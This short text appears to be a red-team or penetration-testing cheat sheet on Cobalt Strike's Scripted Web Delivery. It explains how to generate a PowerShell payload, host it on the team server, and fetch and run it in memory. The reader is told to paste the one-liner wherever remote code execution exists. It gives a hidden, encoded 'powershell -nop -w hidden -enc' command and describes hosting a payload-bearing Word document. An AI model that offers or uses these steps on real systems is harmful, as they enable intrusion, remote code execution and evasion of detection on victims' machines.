Attacks

- Scripted Web Delivery (S)

The easiest to leverage is the PowerShell payload. In Cobalt Strike, go to Attacks > Scripted Web Delivery (S) and generate a 64-bit PowerShell payload for a listener. The URI path can be anything.

This will generate a PowerShell payload and host it on the team server so that it can be downloaded over HTTP and executed in-memory. After clicking Launch, Cobalt Strike will generate the PowerShell one-liner that will do just that.

Copy/paste this line where you have RCE. Its a good practice to encode the IEX part of the command (To encode the command go to Exploitation/Remote Shell/Reverse Shell - Powershell/to encode commands):

powershell -nop -w hidden -enc {encoded command}

Then to host a file containing that payload, for example, a word document:

Go to Site Management > Host File and select your document.